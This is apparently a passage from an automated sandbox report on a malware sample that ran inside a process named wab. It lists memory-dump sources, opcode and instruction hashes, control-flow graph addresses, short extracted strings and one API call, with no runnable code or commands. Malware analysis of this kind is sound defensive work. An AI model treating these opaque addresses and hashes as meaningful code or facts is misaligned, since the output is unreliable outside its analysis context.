                                                  • Instruction Fuzzy Hash: F6829D79A00209DFCB1ACFA8C984AEEBBF2BF49304F158559E409DB361D730E955CB61
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_24490000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dd5c6bf1eb2b94c5a7894aae5e2608fdf0d7be7f53ffc9da9dc006b474e353c0
                                                  • Instruction ID: 4339dca6754e51e77658ad11079f5adc18cccc42ff1d94da647dc088ea58bb26
                                                  • Opcode Fuzzy Hash: dd5c6bf1eb2b94c5a7894aae5e2608fdf0d7be7f53ffc9da9dc006b474e353c0
                                                  • Instruction Fuzzy Hash: 54F1D2B4E01218CFDB14DFA9C884B9DBBF2BF88304F5481A9E818AB355DB749985CF51
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_24490000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0dd46fcc33ad40c831b2019ed0d85f67d649053eb7045cd026d8a5765da64926
                                                  • Instruction ID: bb0d8b04d50edeb2570c29740133ecec4cd194da371da3cd15bae2aabc523803
                                                  • Opcode Fuzzy Hash: 0dd46fcc33ad40c831b2019ed0d85f67d649053eb7045cd026d8a5765da64926
                                                  • Instruction Fuzzy Hash: 45C1A378E01218CFDB54DFA5C944B9DBBB2FF88300F2085A9D809AB365DB359A85CF51
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1480987e59ea272fd6fab5eb288ad4134dd1769b2fdd00e7e9aba8f54541df1c
                                                  • Instruction ID: d306714d3debc6dfdc8f21dd9234cf68190a6b2ccd3d22279c8a2846e613822d
                                                  • Opcode Fuzzy Hash: 1480987e59ea272fd6fab5eb288ad4134dd1769b2fdd00e7e9aba8f54541df1c
                                                  • Instruction Fuzzy Hash: DFC1C678E01218CFDB15DFA5C954B9DBBB2BF88304F2080A9D809AB365DB345E85CF51
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_24490000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4162818022c5da88ff8c1baf24bce1d9dafcde1e8562dcd1e16217f010fc7a60
                                                  • Instruction ID: 17e270761163c3ac8be183118239527404680465079a9d6424bfddaa27895bbb
                                                  • Opcode Fuzzy Hash: 4162818022c5da88ff8c1baf24bce1d9dafcde1e8562dcd1e16217f010fc7a60
                                                  • Instruction Fuzzy Hash: D8A1E274D002088FDB14DFA9C984BDDBBB1FF89314F208269E518AB3A6DB749985CF51
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_24490000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5d172091c0faff851cd0d67f73c82bcc48afbbfe1840c15fb7bc27450702e792
                                                  • Instruction ID: d87c2e2097a894f8c02d2faec1bbb5c07f52699bc82559a98cbd967913ff6a89
                                                  • Opcode Fuzzy Hash: 5d172091c0faff851cd0d67f73c82bcc48afbbfe1840c15fb7bc27450702e792
                                                  • Instruction Fuzzy Hash: 42A19075E012298FEB64CF6AC944B9DBBF2BF89300F14C5A9D808AB254DB745A85CF11
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_24490000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 698dfd5dda3a8487e4ba9895f9238d5c58285db4afac5c5a6a0455421c87ffec
                                                  • Instruction ID: 659e8286079b50bd912a4b51265c7073e914ca3603851e0518e43b85e5369483
                                                  • Opcode Fuzzy Hash: 698dfd5dda3a8487e4ba9895f9238d5c58285db4afac5c5a6a0455421c87ffec
                                                  • Instruction Fuzzy Hash: FAA1E374D002088FDB14DFA9C984BDDBBB1FF89304F208669E508AB3A5DB749985CF51
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_24490000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c50ccf27936624e94b9a8ef8236bd472df490d133af06149e9af1db4966075a4
                                                  • Instruction ID: 1aaef91001387e855863180958bc42ba841709fbeac670f385d3a4d0ddbe409b
                                                  • Opcode Fuzzy Hash: c50ccf27936624e94b9a8ef8236bd472df490d133af06149e9af1db4966075a4
                                                  • Instruction Fuzzy Hash: AEA182B5E012298FEB68CF6AC944B9DFBF2BF88300F14C1A9D508A7254DB745A85CF51
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_24490000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 05c4fcadad5c3d6b50e871aac95f5cd656f0fda4b170271fe63f102401b88569
                                                  • Instruction ID: 27703f29a2016eaea510a6abb1cf7d6bbf6085bd6946ffe230ce46b191fa90c4
                                                  • Opcode Fuzzy Hash: 05c4fcadad5c3d6b50e871aac95f5cd656f0fda4b170271fe63f102401b88569
                                                  • Instruction Fuzzy Hash: 1B91E374900208CFDB10DFA8C888BDDBBF1FF49315F2096A9E509AB2A1DB759985CF51
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_24490000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 55e5e79d11a8552f8bcbccf3dab26a2e82c6be11766e2047521e4b24b97f2bb0
                                                  • Instruction ID: 8fa7c9728116b14c894aef6b8fa594799976562de093215fd1f7b4a3ddaf53bb
                                                  • Opcode Fuzzy Hash: 55e5e79d11a8552f8bcbccf3dab26a2e82c6be11766e2047521e4b24b97f2bb0
                                                  • Instruction Fuzzy Hash: 9F8195B5E016198FEB68CF6AC954B9EBBF2BF88300F14C1E9D408A7254DB745A85CF11
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4a54db73194466f13499b067a18f35dd41e3822ef8359c154106e411ee990fe8
                                                  • Instruction ID: e771486de79b99bb0a6d18f9bb51251c9a0db7592a973440f9cc0f4e3839a53b
                                                  • Opcode Fuzzy Hash: 4a54db73194466f13499b067a18f35dd41e3822ef8359c154106e411ee990fe8
                                                  • Instruction Fuzzy Hash: 1B51563CD01208CBDB06DFA8C8847EDBBB2BF89304F648529E414AB799D7759985CF91
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ec8d081c4568a503bdc1e8aab9a1d5a02a1137ed6a32bf781085a7189ba93a37
                                                  • Instruction ID: aa3c15f832aa3b98c05f3f19d1cff1fe0bd7646148c59ff40aaa25205f071f96
                                                  • Opcode Fuzzy Hash: ec8d081c4568a503bdc1e8aab9a1d5a02a1137ed6a32bf781085a7189ba93a37
                                                  • Instruction Fuzzy Hash: A8510878E00208DFDB09CFAAD544ADDFBB2EF88300F248029E819AB365DB756845CF55
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 19e2fd1f1822415e0eb31f0303374b600b81c2ad29388ecf6bb5dfabd58879df
                                                  • Instruction ID: 3876fbbb87df162fe2a90323c490590dd965e85e3161a8d5aa0177cdcc939594
                                                  • Opcode Fuzzy Hash: 19e2fd1f1822415e0eb31f0303374b600b81c2ad29388ecf6bb5dfabd58879df
                                                  • Instruction Fuzzy Hash: 2851D678E00208DFDB09DFAAD584A9DBBF6FF88300F248429E819AB365DB345845CF55
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ea4afc887beb2e7f4ffa86504370310b806445b6bfd65c141713de2445f87fe2
                                                  • Instruction ID: 312baa132cf32de62050270c6743edcf0e3c073f57d2cd2813a9c80916e2316a
                                                  • Opcode Fuzzy Hash: ea4afc887beb2e7f4ffa86504370310b806445b6bfd65c141713de2445f87fe2
                                                  • Instruction Fuzzy Hash: 5351333CD01208CBCB16DFA8C884BEDBBB2BF48304F649529E514AB798D7799881CF51
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_24490000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 67ec2a74a8a0b4a2b783078d47bb3449d3e7ca89f9685efcc36ea0d7775062f4
                                                  • Instruction ID: 625d086b2ed980859bec12667caec452a5f831c88307c7eecfa6d037b8b0542c
                                                  • Opcode Fuzzy Hash: 67ec2a74a8a0b4a2b783078d47bb3449d3e7ca89f9685efcc36ea0d7775062f4
                                                  • Instruction Fuzzy Hash: 21416A71E016188BEB68CF6BC94479EFAF3BFC9304F14C5A9C50CA6264DB750A858F51
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_24490000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ad1076a90cda7c825aa3cb59dd0ac04406a819b1a3301f8f32c1ad53821d8b3e
                                                  • Instruction ID: 20fa819ace6813e620536aaa6fc0a681c13e616a634183581e31a6458f46b1dc
                                                  • Opcode Fuzzy Hash: ad1076a90cda7c825aa3cb59dd0ac04406a819b1a3301f8f32c1ad53821d8b3e
                                                  • Instruction Fuzzy Hash: 2541E475E01208CBEF14DFAAC54469DBBF2BF89300F24C12AD818AB265DB385945CF45

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 527 28b0c8f-28b0c91 528 28b0cb7-28b0cb9 527->528 529 28b0c94-28b0c9a 527->529 530 28b0cbf-28b0cc0 528->530 529->530 531 28b0c9c-28b0cb5 529->531 533 28b0cc2-28b0cc3 530->533 534 28b0cc7-28b0cd0 530->534 531->528 533->534 538 28b0c5b-28b0c88 534->538 539 28b0cd1-28b0cdd call 28b0780 534->539 538->527 543 28b0ce2 539->543 544 28b0cee-28b104e call 28b0780 * 13 543->544 618 28b1056-28b105f 544->618 724 28b1062 call 28b2790 618->724 725 28b1062 call 28b27f0 618->725 619 28b1068-28b107d 727 28b1080 call 28b3cb1 619->727 728 28b1080 call 28b3cc0 619->728 621 28b1086-28b108f 729 28b1092 call 28b41a0 621->729 730 28b1092 call 28b4285 621->730 622 28b1098-28b10c2 625 28b10cb-28b10ce call 28b5362 622->625 626 28b10d4-28b10fe 625->626 629 28b1107-28b110a call 28bc146 626->629 630 28b1110-28b113a 629->630 633 28b1143-28b1146 call 28bc468 630->633 634 28b114c-28b1176 633->634 637 28b117f-28b1182 call 28bc738 634->637 638 28b1188-28b11b2 637->638 641 28b11bb-28b11be call 28bca08 638->641 642 28b11c4-28b11f7 641->642 645 28b1203-28b1209 call 28bccd8 642->645 646 28b120f-28b124b 645->646 649 28b1257-28b125d call 28bcfab 646->649 650 28b1263-28b129f 649->650 653 28b12ab-28b12b1 call 28bd599 650->653 654 28b12b7-28b13d2 653->654 667 28b13de-28b13f0 call 28b5362 654->667 668 28b13f6-28b145c 667->668 673 28b1467-28b1473 call 28bd869 668->673 674 28b1479-28b1485 673->674 675 28b1490-28b149c call 28bd869 674->675 676 28b14a2-28b14ae 675->676 677 28b14b9-28b14c5 call 28bd869 676->677 678 28b14cb-28b14d7 677->678 679 28b14e2-28b14ee call 28bd869 678->679 680 28b14f4-28b1500 679->680 681 28b150b-28b1517 call 28bd869 680->681 682 28b151d-28b1529 681->682 683 28b1534-28b1540 call 28bd869 682->683 684 28b1546-28b1552 683->684 685 28b155d-28b1569 call 28bd869 684->685 686 28b156f-28b158c 685->686 688 28b1597-28b15a3 call 28bd869 686->688 689 28b15a9-28b15b5 688->689 690 28b15c0-28b15cc call 28bd869 689->690 691 28b15d2-28b15de 690->691 692 28b15e9-28b15f5 call 28bd869 691->692 693 28b15fb-28b1607 692->693 694 28b1612-28b161e call 28bd869 693->694 695 28b1624-28b1630 694->695 696 28b163b-28b1647 call 28bd869 695->696 697 28b164d-28b1659 696->697 698 28b1664-28b1670 call 28bd869 697->698 699 28b1676-28b1682 698->699 700 28b168d-28b1699 call 28bd869 699->700 701 28b169f-28b16ab 700->701 702 28b16b6-28b16c2 call 28bd869 701->702 703 28b16c8-28b16d4 702->703 704 28b16df-28b16eb call 28bd869 703->704 705 28b16f1-28b17aa 704->705 724->619 725->619 727->621 728->621 729->622 730->622
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4!h!X!h!$LR]q$P h!$P(h!$X&h!$\ve!$\ve!$\ve!$\ve!$\ve!$\ve!$\ve!$\ve!$\ve!$\ve!$\ve!$\ve!$\ve!$\ve!
                                                  • API String ID: 0-1390162697
                                                  • Opcode ID: 3eb45b262c2694a446cc2f89e54bacd67ebc0e7cdec13a5b85dc9aaa05450b3c
                                                  • Instruction ID: eec682acfd376e2b64a1f279d613160163af32513240f2ffc5d72697f48a824e
                                                  • Opcode Fuzzy Hash: 3eb45b262c2694a446cc2f89e54bacd67ebc0e7cdec13a5b85dc9aaa05450b3c
                                                  • Instruction Fuzzy Hash: FA623C78980219DFCB54DF28DD94AADBBB2FF48300F2089A5D809AB359DB345D99CF41

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 746 28b0ca0-28b0cb5 747 28b0cb7-28b0cb9 746->747 748 28b0cbf-28b0cc0 747->748 749 28b0cc2-28b0cc3 748->749 750 28b0cc7-28b0cd0 748->750 749->750 754 28b0c5b-28b0c91 750->754 755 28b0cd1-28b0cdd call 28b0780 750->755 754->747 760 28b0c94-28b0c9a 754->760 761 28b0ce2 755->761 760->748 762 28b0c9c 760->762 763 28b0cee-28b104e call 28b0780 * 13 761->763 762->746 837 28b1056-28b105f 763->837 940 28b1062 call 28b2790 837->940 941 28b1062 call 28b27f0 837->941 838 28b1068-28b107d 943 28b1080 call 28b3cb1 838->943 944 28b1080 call 28b3cc0 838->944 840 28b1086-28b108f 945 28b1092 call 28b41a0 840->945 946 28b1092 call 28b4285 840->946 841 28b1098-28b10c2 844 28b10cb-28b10ce call 28b5362 841->844 845 28b10d4-28b10fe 844->845 848 28b1107-28b110a call 28bc146 845->848 849 28b1110-28b113a 848->849 852 28b1143-28b1146 call 28bc468 849->852 853 28b114c-28b1176 852->853 856 28b117f-28b1182 call 28bc738 853->856 857 28b1188-28b11b2 856->857 860 28b11bb-28b11be call 28bca08 857->860 861 28b11c4-28b11f7 860->861 864 28b1203-28b1209 call 28bccd8 861->864 865 28b120f-28b124b 864->865 868 28b1257-28b125d call 28bcfab 865->868 869 28b1263-28b129f 868->869 872 28b12ab-28b12b1 call 28bd599 869->872 873 28b12b7-28b13d2 872->873 886 28b13de-28b13f0 call 28b5362 873->886 887 28b13f6-28b145c 886->887 892 28b1467-28b1473 call 28bd869 887->892 893 28b1479-28b1485 892->893 894 28b1490-28b149c call 28bd869 893->894 895 28b14a2-28b14ae 894->895 896 28b14b9-28b14c5 call 28bd869 895->896 897 28b14cb-28b14d7 896->897 898 28b14e2-28b14ee call 28bd869 897->898 899 28b14f4-28b1500 898->899 900 28b150b-28b1517 call 28bd869 899->900 901 28b151d-28b1529 900->901 902 28b1534-28b1540 call 28bd869 901->902 903 28b1546-28b1552 902->903 904 28b155d-28b1569 call 28bd869 903->904 905 28b156f-28b158c 904->905 907 28b1597-28b15a3 call 28bd869 905->907 908 28b15a9-28b15b5 907->908 909 28b15c0-28b15cc call 28bd869 908->909 910 28b15d2-28b15de 909->910 911 28b15e9-28b15f5 call 28bd869 910->911 912 28b15fb-28b1607 911->912 913 28b1612-28b161e call 28bd869 912->913 914 28b1624-28b1630 913->914 915 28b163b-28b1647 call 28bd869 914->915 916 28b164d-28b1659 915->916 917 28b1664-28b1670 call 28bd869 916->917 918 28b1676-28b1682 917->918 919 28b168d-28b1699 call 28bd869 918->919 920 28b169f-28b16ab 919->920 921 28b16b6-28b16c2 call 28bd869 920->921 922 28b16c8-28b16d4 921->922 923 28b16df-28b16eb call 28bd869 922->923 924 28b16f1-28b17aa 923->924 940->838 941->838 943->840 944->840 945->841 946->841
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4!h!X!h!$LR]q$P h!$P(h!$X&h!$\ve!$\ve!$\ve!$\ve!$\ve!$\ve!$\ve!$\ve!$\ve!$\ve!$\ve!$\ve!$\ve!$\ve!
                                                  • API String ID: 0-1390162697
                                                  • Opcode ID: 0f855bf3bd2fa66288729b8f0042f43377506798f383214b50ee8bfc1dea3fa3
                                                  • Instruction ID: 95f5c55b9e3faf3a2101a6358731dbddccd20ffcb0bcfdfbe277004ff829044c
                                                  • Opcode Fuzzy Hash: 0f855bf3bd2fa66288729b8f0042f43377506798f383214b50ee8bfc1dea3fa3
                                                  • Instruction Fuzzy Hash: 1F522C78980219DFCB54DF28DD94AADBBB2FF48300F2089A5D809AB359DB345D99CF41

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 965 28b76f1-28b76f2 966 28b7717-28b7725 965->966 967 28b76f4-28b7714 965->967 968 28b772b-28b774e 966->968 969 28b7b54-28b7b58 966->969 967->966 978 28b77fc-28b7800 968->978 979 28b7754-28b7761 968->979 970 28b7b5a-28b7b6e 969->970 971 28b7b71-28b7b7f 969->971 975 28b7b81-28b7b96 971->975 976 28b7bf0-28b7c05 971->976 985 28b7b98-28b7b9b 975->985 986 28b7b9d-28b7baa 975->986 987 28b7c0c-28b7c19 976->987 988 28b7c07-28b7c0a 976->988 982 28b7848-28b7851 978->982 983 28b7802-28b7810 978->983 991 28b7763-28b776e 979->991 992 28b7770 979->992 989 28b7c67 982->989 990 28b7857-28b7861 982->990 983->982 1003 28b7812-28b782d 983->1003 993 28b7bac-28b7bed 985->993 986->993 994 28b7c1b-28b7c56 987->994 988->994 997 28b7c6c-28b7c7a 989->997 990->969 995 28b7867-28b7870 990->995 998 28b7772-28b7774 991->998 992->998 1044 28b7c5d-28b7c64 994->1044 1001 28b787f-28b788b 995->1001 1002 28b7872-28b7877 995->1002 1013 28b7c9f-28b7cb4 997->1013 1014 28b7c7c-28b7c9c 997->1014 998->978 1005 28b777a-28b77dc 998->1005 1001->997 1008 28b7891-28b7897 1001->1008 1002->1001 1023 28b783b 1003->1023 1024 28b782f-28b7839 1003->1024 1055 28b77de 1005->1055 1056 28b77e2-28b77f9 1005->1056 1010 28b7b3e-28b7b42 1008->1010 1011 28b789d-28b78ad 1008->1011 1010->989 1016 28b7b48-28b7b4e 1010->1016 1021 28b78af-28b78bf 1011->1021 1022 28b78c1-28b78c3 1011->1022 1032 28b7c9e 1014->1032 1033 28b7cb5-28b7cbc 1014->1033 1016->969 1016->995 1030 28b78c6-28b78cc 1021->1030 1022->1030 1031 28b783d-28b783f 1023->1031 1024->1031 1030->1010 1038 28b78d2-28b78e1 1030->1038 1031->982 1039 28b7841 1031->1039 1032->1013 1041 28b798f-28b79ba call 28b7538 * 2 1038->1041 1042 28b78e7 1038->1042 1039->982 1059 28b79c0-28b79c4 1041->1059 1060 28b7aa4-28b7abe 1041->1060 1046 28b78ea-28b78fb 1042->1046 1046->997 1048 28b7901-28b7913 1046->1048 1048->997 1051 28b7919-28b7933 call 28b80d8 1048->1051 1054 28b7939-28b7949 1051->1054 1054->1010 1058 28b794f-28b7952 1054->1058 1055->1056 1056->978 1061 28b795c-28b795f 1058->1061 1062 28b7954-28b795a 1058->1062 1059->1010 1065 28b79ca-28b79ce 1059->1065 1060->969 1080 28b7ac4-28b7ac8 1060->1080 1061->989 1063 28b7965-28b7968 1061->1063 1062->1061 1062->1063 1066 28b796a-28b796e 1063->1066 1067 28b7970-28b7973 1063->1067 1069 28b79d0-28b79dd 1065->1069 1070 28b79f6-28b79fc 1065->1070 1066->1067 1071 28b7979-28b797d 1066->1071 1067->989 1067->1071 1083 28b79df-28b79ea 1069->1083 1084 28b79ec 1069->1084 1072 28b79fe-28b7a02 1070->1072 1073 28b7a37-28b7a3d 1070->1073 1071->989 1078 28b7983-28b7989 1071->1078 1072->1073 1079 28b7a04-28b7a0d 1072->1079 1074 28b7a49-28b7a4f 1073->1074 1075 28b7a3f-28b7a43 1073->1075 1081 28b7a5b-28b7a5d 1074->1081 1082 28b7a51-28b7a55 1074->1082 1075->1044 1075->1074 1078->1041 1078->1046 1085 28b7a0f-28b7a14 1079->1085 1086 28b7a1c-28b7a32 1079->1086 1087 28b7aca-28b7ad4 call 28b63e0 1080->1087 1088 28b7b04-28b7b08 1080->1088 1089 28b7a5f-28b7a68 1081->1089 1090 28b7a92-28b7a94 1081->1090 1082->1010 1082->1081 1091 28b79ee-28b79f0 1083->1091 1084->1091 1085->1086 1086->1010 1087->1088 1101 28b7ad6-28b7aeb 1087->1101 1088->1044 1092 28b7b0e-28b7b12 1088->1092 1095 28b7a6a-28b7a6f 1089->1095 1096 28b7a77-28b7a8d 1089->1096 1090->1010 1097 28b7a9a-28b7aa1 1090->1097 1091->1010 1091->1070 1092->1044 1099 28b7b18-28b7b25 1092->1099 1095->1096 1096->1010 1104 28b7b27-28b7b32 1099->1104 1105 28b7b34 1099->1105 1101->1088 1110 28b7aed-28b7b02 1101->1110 1107 28b7b36-28b7b38 1104->1107 1105->1107 1107->1010 1107->1044 1110->969 1110->1088
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
                                                  • API String ID: 0-1435242062
                                                  • Opcode ID: 92a2c30bbb0c2d96a3eeaee4f7f6fdada53529eb7cdb04f5c66e418663c3c3bc
                                                  • Instruction ID: 194a1b964a68ca17f6384c486963ea02ae78ec2455fb112383525fac6953fcd3
                                                  • Opcode Fuzzy Hash: 92a2c30bbb0c2d96a3eeaee4f7f6fdada53529eb7cdb04f5c66e418663c3c3bc
                                                  • Instruction Fuzzy Hash: 7D126839A006098FCB16CF68D984AEEBBF2EF89314F158599E459DB3A1D730ED41CB50

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1251 24494258-24494261 1252 2449426a-2449426d 1251->1252 1253 24494263-24494268 1251->1253 1255 2449426f-24494274 1252->1255 1256 24494276-24494279 1252->1256 1254 244942a2-244942a5 1253->1254 1255->1254 1257 2449427b-24494280 1256->1257 1258 24494282-24494285 1256->1258 1257->1254 1259 2449428e-24494291 1258->1259 1260 24494287-2449428c 1258->1260 1261 2449429a-2449429d 1259->1261 1262 24494293-24494298 1259->1262 1260->1254 1263 2449429f 1261->1263 1264 244942a6-24494306 1261->1264 1262->1254 1263->1254 1271 24494308-24494316 1264->1271 1272 2449432b-24494347 1264->1272 1273 2449431b-2449432a call 24494200 1271->1273 1277 24494373-24494376 1272->1277 1279 24494349-2449434d 1272->1279 1273->1272 1273->1277 1280 24494378-2449437e 1277->1280 1281 2449438c-244943bb 1277->1281 1282 2449434f-24494354 1279->1282 1283 24494356-2449435f 1279->1283 1280->1273 1284 24494380 1280->1284 1288 244943bd-244943c0 1281->1288 1289 244943c7-244943cd 1281->1289 1285 24494382-24494389 1282->1285 1283->1277 1287 24494361-2449436a 1283->1287 1284->1285 1287->1277 1290 2449436c-24494371 1287->1290 1288->1289 1291 244943c2-244943c5 1288->1291 1292 244943cf-244943d2 1289->1292 1293 244943e1-24494415 1289->1293 1290->1285 1291->1289 1294 24494418-24494470 1291->1294 1292->1293 1295 244943d4-244943d6 1292->1295 1299 24494477-244944e6 1294->1299 1295->1293 1296 244943d8-244943db 1295->1296 1296->1293 1296->1299 1317 244944e8-244944f7 1299->1317 1318 2449450b-24494514 1299->1318 1319 244944f9-244944fd 1317->1319 1320 24494517-2449456d 1317->1320 1355 24494500 call 24494258 1319->1355 1356 24494500 call 244942f8 1319->1356 1357 24494500 call 244945c1 1319->1357 1358 24494500 call 244945f5 1319->1358 1359 24494500 call 24494247 1319->1359 1325 24494578-24494581 1320->1325 1326 2449456f-24494576 1320->1326 1321 24494503-24494508 1321->1318 1328 2449458c 1325->1328 1329 24494583-2449458a 1325->1329 1327 24494593-2449459c 1326->1327 1330 24494630-24494634 1327->1330 1331 244945a2-244945bf 1327->1331 1328->1327 1329->1327 1332 2449463d-24494659 1330->1332 1360 24494637 call 2449473f 1330->1360 1361 24494637 call 24494750 1330->1361 1331->1332 1336 2449465b-2449465e 1332->1336 1337 24494660-244946ba 1332->1337 1336->1337 1338 244946c2-244946cb 1336->1338 1337->1338 1340 244946cd-244946d0 1338->1340 1341 244946d2-24494708 1338->1341 1340->1341 1342 24494737-2449473d 1340->1342 1341->1342 1351 2449470a-2449472f 1341->1351 1351->1342 1355->1321 1356->1321 1357->1321 1358->1321 1359->1321 1360->1332 1361->1332
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_24490000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8bq$Haq$Haq$Haq$TJbq
                                                  • API String ID: 0-1597716666
                                                  • Opcode ID: ceed617cfc7323df5f40f8db516da6c0575ab6f969e70e12d9865a78dc6c8328
                                                  • Instruction ID: 2ed1bcf561e493b769ba75611e21dafc6421c325d06d2708cfa55819d4e76755
                                                  • Opcode Fuzzy Hash: ceed617cfc7323df5f40f8db516da6c0575ab6f969e70e12d9865a78dc6c8328
                                                  • Instruction Fuzzy Hash: 3ED1C234B082048FCB15DB68C890A9E7FF6FF89320F5441A5D505DB3A5CA35DD46CB92
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05BD7202
                                                  Strings
                                                  Memory Dump Source
